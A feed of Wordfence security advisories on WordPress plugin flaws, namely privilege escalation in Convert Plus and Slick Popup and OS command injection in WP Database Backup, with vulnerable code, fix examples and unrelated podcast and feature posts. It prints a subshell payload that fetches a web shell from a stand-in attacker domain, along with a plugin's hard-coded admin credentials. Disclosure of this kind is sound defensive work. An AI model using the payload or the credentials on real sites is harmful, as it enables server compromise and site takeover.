Critical Vulnerability Patched in Popular Convert Plus Plugin

Description: Unauthenticated Administrator Creation
CVSS v3.0 Score: 10.0 (Critical)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Affected Plugin: Convert Plus
Plugin Slug: convertplug
Affected Versions: <= 3.4.2
Patched Version: 3.4.3

On Friday May 24th, our Threat Intelligence team identified a vulnerability present in Convert Plus, a commercial WordPress plugin with an estimated 100,000 active installs. This flaw allowed unauthenticated attackers to register new accounts with arbitrary user roles, up to and including Administrator accounts. We disclosed this issue privately to the plugin’s development team, who released a patch just a few days later.

Convert Plus (formerly convertplug) versions up to 3.4.2 are vulnerable to attacks against this flaw. All Convert Plus users should update to version 3.4.3 immediately, as this is a critical security issue. We have released a firewall rule to protect Wordfence Premium users who may not be able to update yet, but we still recommend installing the patch. Free users will receive the new rule after thirty days.

Vulnerability In Detail

Convert Plus is a lead generation plugin used to display marketing popups, info bars, and other elements to a site’s visitors with various calls-to-action like email subscription and coupon codes. When setting up a form for handling new subscribers, administrators can define a WordPress user role to be associated with the email address provided. By default this value is None and no user is created, but the site’s owner can have these forms create new Subscriber accounts, or any other role they’d like. The exception is the Administrator role: the plugin removes it from the list of available roles when generating the dropdown menu.

global $wp_roles;
$roles    = $wp_roles->get_names();
$user_arr = array();
foreach ( $roles as $rkey => $rvalue ) {
	$user_arr [ $rvalue ] = $rvalue;
}
$first_item = array( 'None' );
$new_arr    = $user_arr;
unset( $new_arr['Administrator'] );
$new_arr = $first_item + $new_arr;

However, in vulnerable versions of the plugin, this intended user role wasn’t fetched from the database on submission. Instead, this setting was reflected in a hidden field on the plugin’s forms called cp_set_user. Because this value is supplied by the same HTTP request as the rest of the subscription entry, it can be modified by the user.

// Add subscriber as new user role to site.
$new_role = isset( $_POST['cp_set_user'] ) ? $_POST['cp_set_user'] : 'None';

if ( 'success' === $status && ! $only_conversion ) {

	if ( '1' === $sub_optin || 1 === $sub_optin ) {
		$list_name  = str_replace( 'cp_connects_', '', $data_option );
		$list_name  = str_replace( '_', ' ', $list_name );
		$page_url   = isset( $cp_settings['cp-page-url'] ) ? $cp_settings['cp-email-body'] : '';
		$style_name = isset( $_POST['cp_module_name'] ) ? esc_attr( $_POST['cp_module_name'] ) : '';
		cp_notify_sub_to_admin( $list_name, $param, $sub_email, $email_sub, $email_body, $cp_page_url, $style_name );
	}
	if ( '' !== $new_role && ( 'None' !== $new_role && 'none' !== $new_role ) ) {
		cp_add_new_user_role( $param, $new_role );
	}
}

This code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed.

Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address. The new account is given a randomized password, but the attacker can issue a typical password reset to gain access to their rogue administrator account.
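The fix a defender wants here is to stop reading the role from the request at all: resolve it from the module's saved settings and still refuse anything outside an allow-list that excludes administrator. The following is an added, stand-alone PHP example and not Convert Plus code; the helper names and the layout of the saved module settings are assumptions.

```php
<?php
// Added example (not Convert Plus code): decide the new subscriber's role from
// the module's saved settings, never from the cp_set_user field in the request.
// Helper names and the settings layout are assumptions made for this example.

/**
 * Build the allow-list of roles a form may assign: every role slug the site
 * knows, minus 'administrator'.  $role_names mirrors WP_Roles::get_names(),
 * i.e. array( 'slug' => 'Display Name' ).  Keying on slugs rather than display
 * names avoids the 'Administrator' vs 'administrator' mismatch in the plugin.
 */
function cp_example_allowed_roles( array $role_names ) {
    unset( $role_names['administrator'] );
    return array_keys( $role_names );
}

/**
 * Resolve the role for one opt-in module.  $saved_modules is the site owner's
 * stored configuration (assumed layout: module id => array( 'cp_set_user' => slug )),
 * $module_id is the only request-supplied value used, and $allowed is the
 * allow-list above.  Returns a role slug, or null when no user should be created.
 */
function cp_example_resolve_role( array $saved_modules, $module_id, array $allowed ) {
    if ( ! isset( $saved_modules[ $module_id ]['cp_set_user'] ) ) {
        return null;                       // unknown module: create nothing
    }
    $role = (string) $saved_modules[ $module_id ]['cp_set_user'];
    if ( '' === $role || 0 === strcasecmp( 'none', $role ) ) {
        return null;                       // the owner chose "None"
    }
    // Strict membership test: a value that is not on the allow-list (including
    // 'administrator', or a role removed since the form was saved) is refused.
    return in_array( $role, $allowed, true ) ? $role : null;
}

// --- Constructed data standing in for WordPress state and an HTTP request ---
$role_names = array(
    'administrator' => 'Administrator',
    'editor'        => 'Editor',
    'subscriber'    => 'Subscriber',
);
$saved_modules = array(
    'newsletter_popup' => array( 'cp_set_user' => 'subscriber' ),
    'coupon_bar'       => array( 'cp_set_user' => 'None' ),
    'tampered_module'  => array( 'cp_set_user' => 'administrator' ), // e.g. edited directly in the DB
);
// A tampered request: the hidden field claims "administrator", but it is never read.
$_POST = array( 'cp_module_name' => 'newsletter_popup', 'cp_set_user' => 'administrator' );

$allowed = cp_example_allowed_roles( $role_names );
$module  = isset( $_POST['cp_module_name'] ) ? (string) $_POST['cp_module_name'] : '';

// The module is configured for subscribers, so that role is returned; cp_set_user is ignored.
var_dump( cp_example_resolve_role( $saved_modules, $module, $allowed ) );
// "None" configured: no user is created.
var_dump( cp_example_resolve_role( $saved_modules, 'coupon_bar', $allowed ) );
// Even a stored 'administrator' fails the allow-list and yields null.
var_dump( cp_example_resolve_role( $saved_modules, 'tampered_module', $allowed ) );
// An unknown module id from the request also yields null.
var_dump( cp_example_resolve_role( $saved_modules, 'no_such_module', $allowed ) );
```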

Video Demonstration

Convert Plus Plugin Vulnerability Exploit Demonstration from Wordfence on Vimeo.

Disclosure Timeline

  • May 24 – Vulnerability discovered. Notified developers privately.
  • May 28 – Patch released by developers. Firewall rule released for Premium users.
  • June 27 – Planned date for firewall rule’s release to Free users.

Well-Handled Response

Vulnerability disclosures are an unfortunate necessity, and it’s important that they’re handled appropriately by all parties involved. In recent disclosures, we’ve seen a variety of responses from the developers we’ve reached out to. For example, in January we received no response at all to a disclosure regarding the Total Donations plugin. More recently, this week’s Slick Popup vulnerability was acknowledged by the developers but remains unpatched.

Conversely, the response from Convert Plus’s team was an excellent example of how to handle a vulnerability disclosure. They responded quickly to our contact, and issued a patch for the flaw within just a few days. Once the patch went live, they published their own blog post alerting their users that an important update was available. They even highlighted the update on the plugin’s CodeCanyon page.

Convert Plus’s CodeCanyon page, featuring an alert regarding the security release.

Conclusion

In this post we shared details of a critical security flaw recently patched in the popular Convert Plus plugin for WordPress. This vulnerability has been patched as of version 3.4.3 of the plugin, and it’s crucial that all affected users patch as soon as possible. We have released a firewall rule which prevents exploits against Wordfence Premium users, which will be available to free users on June 27th.

As always, we will monitor our network for activity associated with this flaw and will update you with any noteworthy campaigns we identify.

The post Critical Vulnerability Patched in Popular Convert Plus Plugin appeared first on Wordfence.


Privilege Escalation Flaw Present In Slick Popup Plugin

In April, our Threat Intelligence team identified a privilege escalation flaw present in the latest version of Slick Popup, a WordPress plugin with approximately 7,000 active installs. We notified the developers, a firm called Om Ak Solutions, who acknowledged the issue and informed us that a patch would be released.

Per our disclosure policy, we allowed 30 days for resolution of this issue before releasing details to the public. Unfortunately, the deadline has passed without a satisfactory patch by the plugin’s developers. At this time, all versions of Slick Popup up to 1.7.1 are vulnerable.

In this post we’ll look at the vulnerability in question and what you should do if you’re making use of the plugin.

Subscriber+ Privilege Escalation Flaw In Support Access Feature

One feature of Slick Popup is the ability to grant support access to the plugin’s developers, Om Ak Solutions, with one click in the dashboard. This generates a new administrator account and sends an email to Om Ak Solutions with details. Two issues in this process combine to create the privilege escalation vulnerability in question.

// ADD NEW ADMIN USER TO WORDPRESS
// ----------------------------------
// Put this file in your WordPress root directory and run it from your browser.
// Delete it when you're done.
//require_once(ABSPATH . 'wp-blog-header.php');
//require_once(ABSPATH . 'wp-includes/registration.php');
// ----------------------------------------------------
// CONFIG VARIABLES
// Make sure that you set these before running the file.
$newusername = 'slickpopupteam';
$newpassword = 'OmakPass13#';
$newemail = 'poke@slickpopup.com';
// ----------------------------------------------------
// This is just a security precaution, to make sure the above "Config Variables" 
// have been changed from their default values.
if ( $newpassword != 'YOURPASSWORD' &&
	 $newemail != 'YOUREMAIL@TEST.com' &&
	 $newusername !='YOURUSERNAME' )
{
	// Check that user doesn't already exist
	if ( !username_exists($newusername) && !email_exists($newemail) )
	{
		// Create user and set role to administrator
		$user_id = wp_create_user( $newusername, $newpassword, $newemail);
		if ( is_int($user_id) )
		{
			$wp_user_object = new WP_User($user_id);
			$wp_user_object->set_role('administrator');

First, the credentials associated with this new administrative account are hard-coded into the plugin. When the user is created, it will have the username slickpopupteam and its password is OmakPass13#. Since this is a known value in all cases, it’s possible for malicious actors to assemble a list of sites making use of the plugin and occasionally test for the presence of this support user. Once logged in, they’re free to create other backdoors independent of this user.

add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );
function action_splite_support_access() {
	$ajaxy = array(); 
	$errors = array(); 
	
	$todo = (isset($_POST['todo']) AND !empty($_POST['todo'])) ? $_POST['todo'] : 'createuser'; 

However, attackers with at least Subscriber access to an affected site can create this user on their own. Since the AJAX action used to generate this user doesn’t contain any capabilities checks, it can be accessed by any logged-in user. This, combined with the hard-coded credentials in the plugin, means any user with an account can grant themselves administrative access and take over a site.
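Both defects have a standard WordPress remedy: an explicit capability check plus a nonce in the AJAX handler, and a password generated per site instead of one compiled into the plugin. The following is an added example written for this post, not Slick Popup's own code; it assumes it runs inside WordPress, and the action name, nonce action and function names are hypothetical.

```php
<?php
// Added example, not Slick Popup's own code: a support-access handler with the
// two missing controls, an authorisation check and a per-site random password.
// Assumes WordPress is loaded; 'splite_example_support' (nonce action) and the
// function/action names are hypothetical.

add_action( 'wp_ajax_splite_example_support_access', 'splite_example_support_access' );

function splite_example_support_access() {
    // 1. Authorisation.  wp_ajax_* handlers run for ANY logged-in user (a
    //    Subscriber included), so the capability must be checked explicitly.
    //    Creating an administrator needs 'create_users' and 'promote_users'.
    if ( ! current_user_can( 'create_users' ) || ! current_user_can( 'promote_users' ) ) {
        wp_send_json_error( 'Insufficient permissions.', 403 );   // wp_send_json_error() ends the request
    }
    // 2. CSRF: the request must carry a nonce issued to this administrator
    //    (emitted in the dashboard with wp_create_nonce( 'splite_example_support' )).
    check_ajax_referer( 'splite_example_support', 'nonce' );

    $username = 'slickpopupteam';          // account name as used by the plugin
    $email    = 'poke@slickpopup.com';     // vendor address as used by the plugin
    if ( username_exists( $username ) || email_exists( $email ) ) {
        wp_send_json_error( 'Support user already exists.', 409 );
    }

    // 3. No fixed credential: a random password generated on this site, for this
    //    request.  Nothing in the shipped code lets a third party predict it.
    $password = wp_generate_password( 32, true, true );

    $user_id = wp_insert_user( array(
        'user_login' => $username,
        'user_pass'  => $password,
        'user_email' => $email,
        'role'       => 'administrator',
    ) );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( $user_id->get_error_message(), 500 );
    }

    // Deliver the credential to the vendor out of band, as the plugin already
    // does by email, and return only the outcome to the browser.
    wp_mail( $email, 'Support access created', "Login: {$username}\nPassword: {$password}" );
    wp_send_json_success( array( 'user_id' => $user_id ) );
}
```

The original plugin's hard-coded username and password would be replaced by the generated value, so a list of sites running the plugin no longer yields a working credential.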

During our research we identified that the user creation script used by this plugin is somewhat popular, and can be found in several GitHub gists like this one. We searched the WordPress.org plugin repository for other uses of this script and found another one of Om Ak Solutions’ plugins, Contact Form 7 Spam Blocker. We included this additional plugin in our report to the developer.

Private Disclosure Timeline

  • April 22 – Vulnerability disclosed to Om Ak Solutions.
  • April 25 – WAF rule released to protect Wordfence Premium users from attacks on this flaw.
  • April 27 – Developer acknowledges issue and states a patch will be released.
  • May 14 – Slick Popup version 1.7.1 released – issue unresolved in this patch.
  • May 22 – Public disclosure deadline.
  • May 25 – WAF rule released for free users.

Shortly before the writing of this article, a representative of Om Ak Solutions claimed a patch has been released for the Pro version of Slick Popup and that a patch for the free version is in progress. The reported patch of the Pro version has not been tested by the Wordfence team at this time.

Next Steps

As mentioned above, Slick Popup versions up to and including 1.7.1 are vulnerable. It is our recommendation that users of the plugin deactivate or delete the plugin until a patch is available.

However, it’s possible to deactivate the vulnerable Support Access feature on current versions of the plugin without affecting the rest of the plugin’s functionality. Doing this requires making a small change to the plugin’s files, and you should note a few things beforehand:

  • This will break the plugin’s ability to grant support access to Om Ak Solutions.
  • Any updates to the plugin will overwrite this change and reactivate the feature.
  • This will not remove an existing slickpopupteam user, legitimate or otherwise. That will need to be done manually if one is present.
  • We cannot provide support for implementing this short-term fix, nor can we assist with other issues that may arise during the process.

To prevent the creation of these users, all you need to do is comment out the line where the action_splite_support_access AJAX action is registered. In the latest version of the plugin, this is on line 523 of the file /libs/admin-pages.php.

Before:

add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );

After:

//add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );

Conclusion

In this post, we detailed an unpatched privilege escalation flaw in the Slick Popup plugin which allows subscribers to gain administrative access to an affected WordPress site. Because of the relatively small userbase of the plugin, and the authentication necessary to exploit it, we do not anticipate widespread attack campaigns leveraging this vulnerability. A firewall rule to protect against attempts to exploit this vulnerability was released on April 25th and is currently available for sites running Wordfence Premium as well as the free version.



OS Command Injection Vulnerability Patched In WP Database Backup Plugin

Toward the end of April, an unnamed security researcher published details of an unpatched vulnerability in WP Database Backup, a WordPress plugin with over 70,000 users. The vulnerability, which was irresponsibly disclosed to the public before attempting to notify the plugin’s developers, was reported as a plugin configuration change flaw. A proof of concept (PoC) exploit was provided which allowed unauthenticated attackers to modify the destination email address for database backups, potentially putting sensitive information in their hands.

Upon further review by our Threat Intelligence team, we determined the scope of this flaw was more severe in reality. In unpatched versions of WP Database Backup, an attacker is able to inject operating system (OS) commands arbitrarily, which are then executed when the plugin performs a database backup. Injected commands would persist until manually removed, executing each time a backup is run.

We immediately notified the plugin’s developer of this issue and deployed a new firewall rule to protect Wordfence users from exploitation of these vulnerabilities. The vulnerabilities have been patched as of version 5.2 of WP Database Backup.

Plugin Configuration Change Vulnerability

The originally disclosed vulnerability present in WP Database Backup allows an attacker to modify a limited selection of the plugin’s internal settings. These settings were vulnerable due to inconsistencies in the way security features were added to the code–in some cases, a capabilities check would be performed or a CSRF nonce would be required, but other cases weren’t protected by these efforts.

In particular, a nonce check was required when the wp-database-backup page of a site’s admin dashboard was accessed. Unfortunately, the function used by the plugin to check for and perform settings changes was hooked into admin_init, not tied to the plugin’s own page in the dashboard. The vulnerable code would still execute on any other page under /wp-admin, allowing the nonce check to be bypassed.

if (isset($_POST['wpsetting'])) {
    if (isset($_POST['wp_local_db_backup_count'])) {
        update_option('wp_local_db_backup_count', esc_attr(sanitize_text_field($_POST['wp_local_db_backup_count'])));
    }
    if (isset($_POST['wp_db_log'])) {
        update_option('wp_db_log', 1);
    } else {
        update_option('wp_db_log', 0);
    }
    if (isset($_POST['wp_db_remove_local_backup'])) {
        update_option('wp_db_remove_local_backup', 1);
    } else {
        update_option('wp_db_remove_local_backup', 0);
    }

    if (isset($_POST['wp_db_backup_enable_htaccess'])) {
        update_option('wp_db_backup_enable_htaccess', 1);
    } else {
        update_option('wp_db_backup_enable_htaccess', 0);
        $path_info = wp_upload_dir();
        @unlink($path_info['basedir'] . '/db-backup/.htaccess');
    }


    if (isset($_POST['wp_db_exclude_table'])) {
        update_option('wp_db_exclude_table', $_POST['wp_db_exclude_table']);
    } else {
        update_option('wp_db_exclude_table', '');
    }
}
if (isset($_POST['wp_db_backup_email_id'])) {

    update_option('wp_db_backup_email_id', esc_attr(sanitize_text_field($_POST['wp_db_backup_email_id'])));
}
if (isset($_POST['wp_db_backup_email_attachment'])) {
    $email_attachment = sanitize_text_field($_POST['wp_db_backup_email_attachment']);
    update_option('wp_db_backup_email_attachment',esc_attr($email_attachment));
}
if (isset($_POST['Submit']) && $_POST['Submit'] == 'Save Settings') {
    if (isset($_POST['wp_db_backup_destination_Email'])) {
        update_option('wp_db_backup_destination_Email', 1);
    } else {
        update_option('wp_db_backup_destination_Email', 0);
    }
}

The entire code block above would run without any security checks on any admin-facing page other than the plugin’s own settings page. Since endpoints like /wp-admin/admin-post.php will trigger admin_init and return true for is_admin for unauthenticated users, an attacker can exploit this code without logging in. The original report drew attention to the email settings, which can be toggled for the plugin to send database backup files via email to a given address. In vulnerable versions, this can be switched on and pointed to an attacker-controlled address to obtain sensitive information from the site’s database.
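The corresponding fix is to gate the admin_init callback on who is calling and on a nonce bound to the action itself, rather than on which dashboard page happened to load. The following is an added example, not WP Database Backup's own code; it assumes it runs inside WordPress, the nonce action and function names are hypothetical, and the .htaccess removal from the original is left out.

```php
<?php
// Added example, not WP Database Backup's own code: the same settings writes,
// gated the way an admin_init callback has to be.  Assumes WordPress is loaded;
// 'wpdb_example_save_settings' (nonce action) and all function names are
// hypothetical.  admin_init also fires for admin-post.php and admin-ajax.php,
// where is_admin() is true even for anonymous visitors, so "we are in the
// admin" is not an authorisation check.

add_action( 'admin_init', 'wpdb_example_save_settings' );

function wpdb_example_save_settings() {
    if ( ! isset( $_POST['wpsetting'] ) ) {
        return;   // not our form submission
    }
    // Who: only users allowed to change site options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 'Forbidden', array( 'response' => 403 ) );
    }
    // Intent: the nonce is tied to this action, so it is verified on every
    // request path, not only when the plugin's own settings page is rendered.
    // The form must emit it with wp_nonce_field( 'wpdb_example_save_settings' ).
    check_admin_referer( 'wpdb_example_save_settings' );

    $post = wp_unslash( $_POST );

    // Each value is coerced to the type the option actually needs.
    update_option(
        'wp_local_db_backup_count',
        isset( $post['wp_local_db_backup_count'] ) ? absint( $post['wp_local_db_backup_count'] ) : 0
    );
    $flags = array( 'wp_db_log', 'wp_db_remove_local_backup', 'wp_db_backup_enable_htaccess', 'wp_db_backup_destination_Email' );
    foreach ( $flags as $flag ) {
        update_option( $flag, isset( $post[ $flag ] ) ? 1 : 0 );
    }
    if ( isset( $post['wp_db_backup_email_id'] ) ) {
        $email = sanitize_email( $post['wp_db_backup_email_id'] );
        if ( is_email( $email ) ) {
            update_option( 'wp_db_backup_email_id', $email );   // never an arbitrary string
        }
    }
    // Excluded tables: keep only names that exist in this database, so an
    // attacker-chosen string never reaches the option that later feeds a shell
    // command (that command must still escape each value when the backup runs).
    $requested = isset( $post['wp_db_exclude_table'] ) ? (array) $post['wp_db_exclude_table'] : array();
    update_option( 'wp_db_exclude_table', wpdb_example_existing_tables( $requested ) );
}

/** Return only those requested names that are real tables in this database. */
function wpdb_example_existing_tables( array $requested ) {
    global $wpdb;
    $existing = $wpdb->get_col( 'SHOW TABLES' );
    return array_values( array_intersect( array_map( 'strval', $requested ), $existing ) );
}
```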

OS Command Injection in Excluded Table Settings

One of the features in WP Database Backup allows users to define tables to be excluded from backups. These excluded tables are stored as an array, which is accessed when a new backup is performed.

public function mysqldump($SQLfilename)
{

    $this->mysqldump_method = 'mysqldump';

    //$this->do_action( 'mysqldump_started' );

    $host = explode(':', DB_HOST);

    $host = reset($host);
    $port = strpos(DB_HOST, ':') ? end(explode(':', DB_HOST)) : '';

    // Path to the mysqldump executable
    $cmd = escapeshellarg($this->get_mysqldump_command_path());

    // We don't want to create a new DB
    $cmd .= ' --no-create-db';

    // Allow lock-tables to be overridden
    if (!defined('WPDB_MYSQLDUMP_SINGLE_TRANSACTION') || WPDB_MYSQLDUMP_SINGLE_TRANSACTION !== false)
        $cmd .= ' --single-transaction';

    // Make sure binary data is exported properly
    $cmd .= ' --hex-blob';

    // Username
    $cmd .= ' -u ' . escapeshellarg(DB_USER);

    // Don't pass the password if it's blank
    if (DB_PASSWORD)
        $cmd .= ' -p' . escapeshellarg(DB_PASSWORD);

    // Set the host
    $cmd .= ' -h ' . escapeshellarg($host);

    // Set the port if it was set
    if (!empty($port) && is_numeric($port))
        $cmd .= ' -P ' . $port;

    // The file we're saving too
    $cmd .= ' -r ' . escapeshellarg($SQLfilename);

    $wp_db_exclude_table = array();
    $wp_db_exclude_table = get_option('wp_db_exclude_table');
    if (!empty($wp_db_exclude_table)) {
        foreach ($wp_db_exclude_table as $wp_db_exclude_table) {
            $cmd .= ' --ignore-table=' . DB_NAME . '.' . $wp_db_exclude_table;
            // error_log(DB_NAME.'.'.$wp_db_exclude_table);
        }
    }

    // The database we're dumping
    $cmd .= ' ' . escapeshellarg(DB_NAME);

    // Pipe STDERR to STDOUT
    $cmd .= ' 2>&1';
    // Store any returned data in an error
    
    $stderr = shell_exec($cmd);

    // Skip the new password warning that is output in mysql > 5.6
    if (trim($stderr) === 'Warning: Using a password on the command line interface can be insecure.') {
        $stderr = '';
    }

    if ($stderr) {
        $this->error($this->get_mysqldump_method(), $stderr);
        error_log($stderr);
    }

    return $this->verify_mysqldump($SQLfilename);
}

The backups themselves are performed by building a mysqldump command to be executed via shell_exec. The plugin uses its own settings and the site’s database credentials to assemble the full command, including the array of excluded tables.

$wp_db_exclude_table = array();
$wp_db_exclude_table = get_option('wp_db_exclude_table');
if (!empty($wp_db_exclude_table)) {
    foreach ($wp_db_exclude_table as $wp_db_exclude_table) {
        $cmd .= ' --ignore-table=' . DB_NAME . '.' . $wp_db_exclude_table;
        // error_log(DB_NAME.'.'.$wp_db_exclude_table);
    }
}

As seen in the relevant snippet above, the array of excluded tables is iterated over to append --ignore-table= arguments to the final mysqldump command. However, since these values are inserted directly into an OS command without sanitization, and an attacker can modify the values of this array by exploiting the configuration change vulnerability above, this can be abused to execute arbitrary commands on the site’s host server.

The simplest way to demonstrate this flaw is via a basic Bash subshell. If, for instance, an attacker has defined the value $(wget evildomain.com/shell.txt -O shell.php) as an “excluded table”, then the commands within the parentheses will be executed before the actual mysqldump command (which will most likely fail, since the returned value from the subshell would be invalid for an --ignore-table argument). In this example, a malicious PHP shell would be pulled down from the attacker’s site and stored as “shell.php” on the victim’s server. This would happen every time a backup was performed with the plugin, either manually or scheduled, until the site’s owner reset the excluded table configuration.
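At the shell boundary the remedy is independent of how the option was written: check each excluded name against the tables that actually exist, and pass the result through escapeshellarg() like every other argument in the command. The following is an added, stand-alone PHP example and not the plugin's code; the table list and option values are constructed stand-ins for $wpdb->get_col('SHOW TABLES') and get_option('wp_db_exclude_table').

```php
<?php
// Added example (not WP Database Backup's code): building the --ignore-table
// arguments so an option value can only ever reach mysqldump as data.  Two
// independent controls: an allow-list against the live table list, and
// escapeshellarg() on everything concatenated into the command.  Pure PHP;
// $existing and the option values below are constructed stand-ins.

/**
 * Return the ' --ignore-table=db.table' fragments for the configured exclusions.
 * Entries that are not real tables are dropped and reported through $rejected,
 * so a tampered option is visible instead of silently shrinking the backup.
 */
function wpdb_example_ignore_table_args( $db_name, array $excluded, array $existing_tables, array &$rejected ) {
    $rejected = array();
    $args     = '';
    foreach ( $excluded as $table ) {
        $table = (string) $table;
        // Control 1: exact, case-sensitive membership in the live table list.
        if ( ! in_array( $table, $existing_tables, true ) ) {
            $rejected[] = $table;
            continue;
        }
        // Control 2: quote the whole value.  The shell then receives one literal
        // argument even if a table name contained metacharacters.
        $args .= ' --ignore-table=' . escapeshellarg( $db_name . '.' . $table );
    }
    return $args;
}

// --- Constructed stand-ins for DB_NAME, SHOW TABLES and the stored option ---
$db_name  = 'wp_site';
$existing = array( 'wp_options', 'wp_posts', 'wp_users', 'wp_usermeta' );
$clean    = array( 'wp_posts', 'wp_usermeta' );     // a legitimate configuration
$tampered = array( 'wp_posts', '$(id)' );           // one real table plus a command substitution, not a table

$base = 'mysqldump --no-create-db --hex-blob -r ' . escapeshellarg( '/tmp/backup.sql' );

// Legitimate case: both tables appear, each quoted, and nothing is rejected.
echo $base . wpdb_example_ignore_table_args( $db_name, $clean, $existing, $rej )
    . ' ' . escapeshellarg( $db_name ) . PHP_EOL;

// Tampered case: only wp_posts survives; the other value is reported, not executed.
$fragment = wpdb_example_ignore_table_args( $db_name, $tampered, $existing, $rej );
echo $base . $fragment . ' ' . escapeshellarg( $db_name ) . PHP_EOL;
foreach ( $rej as $bad ) {
    error_log( 'wp_db_exclude_table contains a non-table value: ' . $bad );
}

// Control 2 on its own: single quotes make the shell treat the substitution as text.
echo escapeshellarg( $db_name . '.' . $tampered[1] ) . PHP_EOL;
```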

Disclosure Timeline

  • April 24 – Original public disclosure of configuration change flaw. Wordfence identifies OS command injection flaw and reaches out to developer.
  • April 25 – Wordfence releases firewall rule to Premium users to prevent exploitation of both flaws.
  • April 27 – Developer acknowledges issue.
  • April 30 – Patch released.
  • May 25 – Firewall rule released for free users.

Conclusion

In today’s post, we detailed a previously undisclosed OS command injection flaw present in the WP Database Backup plugin. This flaw has been patched as of version 5.2 and we recommend affected users ensure they’ve updated to the latest available version. Sites running Wordfence Premium have been protected from exploitation of these flaws since April 24th. Sites running the free version received the firewall rule update on May 25th.



Podcast Episode 16: Cami Kaos talks WordCamps, Meetups and Community

If you’ve ever attended a WordCamp or a WordPress meetup in the last 6 years, that community experience was based on the guidance and support from WordCamp Central and Community Manager Cami Kaos. Cami is the primary contact for the 150 WordCamps and over 600 WordPress meetups taking place around the world this year. Her efforts ensure that the volunteers contributing to community events have what they need to succeed. Cami shares her thoughts on getting started with WordPress meetups and WordCamps, challenges facing the growing community, and how to get involved.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find me on Twitter as @mmaunder and Cami Kaos as @CamiKaos. You can learn more about getting involved with the WordPress community on make.wordpress.org. Please don’t hesitate to post your feedback in the comments below.



Podcast Episode 15: So. Much. News!!

In this week’s news we have a lot to cover. We talk about an intrusion at StackOverflow, a proposal to modify the WordPress plugin guidelines, how Chinese hackers are getting better at stealing US cyber secrets, ethical issues of firms promising ransomware solutions that only include paying the ransomware, a breach on the Joomla extension directory server, Google’s aggregation of your purchase receipts and suspension of Android support for Huawei amongst many other stories.

Here are approximate timestamps in case you want to jump around:
0:46 Code signing in WordPress 5.2
4:07 Stack Overflow intrusion
8:00 WordPress plugin guideline proposal
12:00 US cyber secrets being stolen by China
16:00 Ransomware solution
21:11 Joomla extension directory experienced an intrusion
24:40 Google aggregating purchase data
27:58 Google suspends Android support for Huawei
33:00 How effective is basic account hygiene at preventing hijacking
35:00 735K fraudulently obtained IP addresses revoked
38:29 Baltimore ransomware nightmare continues
43:01 460,000 user accounts breached on Uniqlo online
43:59 OGusers forum hacked

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find me on Twitter as @mmaunder and Kathy as @kathyzant. Please don’t hesitate to post your feedback in the comments below.



Podcast Episode 14: Interview with Trauma Surgeon and Plugin Dev Andy Fragen

Dr. Andy Fragen is a trauma/acute care surgeon as well as a prolific WordPress plugin author. One of his plugins, GitHub Updater, allows you to host WordPress plugins and themes on GitHub instead of WordPress.org. Andy supports numerous WordCamps and is an active member of the WordPress community in southern California. I had the pleasure of talking with Andy at WordCamp Orange County. He’s a fascinating person and I really think you’ll enjoy our conversation.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find me on Twitter as @mmaunder and Dr. Andy Fragen as @andyfragen. Please don’t hesitate to post your feedback in the comments below.



Podcast Episode 12: Major WhatsApp Vulnerability and Other News

This week in our news-focused episode we cover the WhatsApp zero-day vulnerability that allegedly was used to infect phones with malware by simply calling a phone with the app. We also announced a new update to the Wordfence plugin, making an updated two-factor authentication feature available to all Wordfence users. We cover a story about SIM hijacking and discuss why we need to move away from SMS 2-factor authentication. We also cover an ongoing supply-chain attack affecting thousands of sites, three antivirus companies that have been compromised, a malvertiser indictment and other stories.

Here are approximate timestamps in case you want to jump around:
0:30 WhatsApp voice calls used to inject malware
7:07 New Wordfence login security features
12:30 Ongoing supply-chain attack
18:58 SIM card hijacking campaign
22:05 Three US Antivirus companies compromised
23:55 Malvertiser compromised
30:12 Opting out of facial recognition at airports
32:48 Microsoft Word gets politically correct
37:38 Binance intrusion
41:25 Federal agencies spending millions to hack into phones

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find me on Twitter as @mmaunder and Kathy as @kathyzant. Please don’t hesitate to post your feedback in the comments below.




Announcing 3 New Login Security Features

Spend any time looking at blocked attacks in Wordfence Live Traffic and you’ll walk away worried about login security. WordPress sites are under constant attack by bots attempting to guess your users’ passwords. A lot of these attacks simply test lists of commonly used passwords along with usernames they think you may have chosen, like ‘admin’ or different takes on your domain name.

More recently we’ve started to see more sophisticated attackers leveraging lists of passwords from data breaches in their attacks. These are referred to as credential stuffing attacks and have a much higher success rate than traditional password guessing attacks. If you’ve given other users access to your website, are you confident that they haven’t reused their password? If they have, you may be just one data breach away from a hacked website.

Today, with the release of Wordfence 7.3.1, we are excited to announce several new login security features! They are:

  • A completely rebuilt two-factor authentication feature, now available in the free version of Wordfence
  • Login page CAPTCHA
  • Improved XML-RPC protection

Together with the other login security features already included in Wordfence, these additions give you robust, layered protection from password guessing and credential stuffing attacks.

Completely Rebuilt Two-Factor Authentication Feature

Two-factor authentication, or 2FA, adds a second layer of security to your users’ accounts. It requires them to not only enter their password, but also a second piece of information only they have access to. An account protected by 2FA is virtually impossible to compromise. Even if an attacker discovers your username and password somehow, they still can’t log in.

Setting up 2FA is easy! Just scan the barcode with your authenticator app and enter a login code.

Use Any TOTP-Based Authenticator App

